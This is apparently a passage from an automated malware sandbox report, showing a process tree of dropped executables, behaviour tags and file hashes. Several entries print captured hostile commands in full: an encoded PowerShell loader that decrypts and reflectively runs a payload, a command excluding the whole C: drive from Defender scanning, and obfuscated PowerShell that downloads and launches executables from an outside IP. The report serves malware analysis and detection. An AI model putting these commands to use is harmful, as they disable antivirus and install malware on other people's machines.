                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:8000
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:6940
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413710101\f642f1aa8c.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413710101\f642f1aa8c.exe"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:7868
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413721121\5ym0ZYg.cmd"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:7236
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413721121\5ym0ZYg.cmd"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:8152
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                        PID:5912
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                          PID:4308
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10413730101\TbV75ZR.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10413730101\TbV75ZR.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:7336
                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:7072
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 500
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                            PID:3392
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413740101\qWR3lUj.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413740101\qWR3lUj.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:7908
                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:6876
                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:7016
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    PID:3684
                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:4644
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Treasurership\Abspawnhlp.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                      PID:5768
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:224
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -NoP -C iex(-join([char[]](65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,110,118,58,84,69,77,80,44,32,36,101,110,118,58,83,121,115,116,101,109,68,114,105,118,101,92,59,32,36,112,116,97,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,54,52,55,51,50,52,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,77,83,70,46,101,120,101,32,45,111,32,36,112,116,97,59,32,115,97,112,115,32,36,112,116,97,59,32,36,112,116,98,32,61,32,36,101,110,118,58,116,109,112,43,34,92,116,101,109,112,95,56,51,50,52,49,57,46,101,120,101,34,59,32,105,119,114,32,104,116,116,112,58,47,47,49,48,57,46,49,50,48,46,49,51,55,46,54,47,82,68,80,95,85,83,69,82,46,101,120,101,32,45,111,32,36,112,116,98,59,32,115,97,112,115,32,36,112,116,98,59)))
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:6368
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:5308
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Ornithoscopy\CamMenuMaker.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                      PID:2460
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\SuperJava_debugv4\CamMenuMaker.exe
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        PID:2060
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:6916
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:4992
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:7152
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                          PID:1004
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:1880
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            PID:7880
                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:1696
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3576 -ip 3576
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5400
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:7140
                                                                                                                                                                                                                                                                          • C:\ProgramData\Touchtap\Updater.exe
                                                                                                                                                                                                                                                                            C:\ProgramData\Touchtap\Updater.exe /u
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:908
                                                                                                                                                                                                                                                                            • C:\Windows\TEMP\datC1C0.tmp\datC1C1.exe
                                                                                                                                                                                                                                                                              C:\Windows\TEMP\datC1C0.tmp\datC1C1.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:7660
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\config\systemprofile\Abspawnhlp.exe"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:7248
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:7308
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                  PID:1868
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\IsInvalid\HelpLink.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6468
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7072 -ip 7072
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1292

                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                    • C:\Config.Msi\e58a6be.rbs

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      9KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      847c40f85888819979c31f37a4b4a271

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      b3969b20eff0a330e93f8996e9a3893a7e699d63

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      e97d6d59e4164f207547c363f8b6ecc08c9bc2d13d1f80d2005e0f37c89fe586

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      e21b56e144c679a54ee3e578fbdfbc659bcd6196cca20a696a9605aa7c50f73b4e0464b7b5e74d168b7949b7fc2a8eeb912d66719e5f59abeec2b3388f56268a

                                                                                                                                                                                                                                                                                    • C:\Config.Msi\e58a6c3.rbs

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      9KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      896d9b487ee0e4ee2e1345822aa0f8fe

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      b2ed3802353bd367f436f30aaba3b85f43878d2c

                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                      c8ee8a1370934193f91eb3891900a64d4c32a45da18f4981e3972de45e1d10cb

                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                      47fffd28f38a4d841ad7e795f09d47754afe5db30f20cd105f85b3f441f4e0e534ea2ae8389372368efb70c710defebacb9608d5025c30b10ab672bfea10a81a

                                                                                                                                                                                                                                                                                    • C:\Config.Msi\e58a6c8.rbs

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      9KB

                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                      61faaad70213b8833f8a68642e6d17a5

                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                      ee0f82eafdac245a5e80d896c1912c628a0210ea

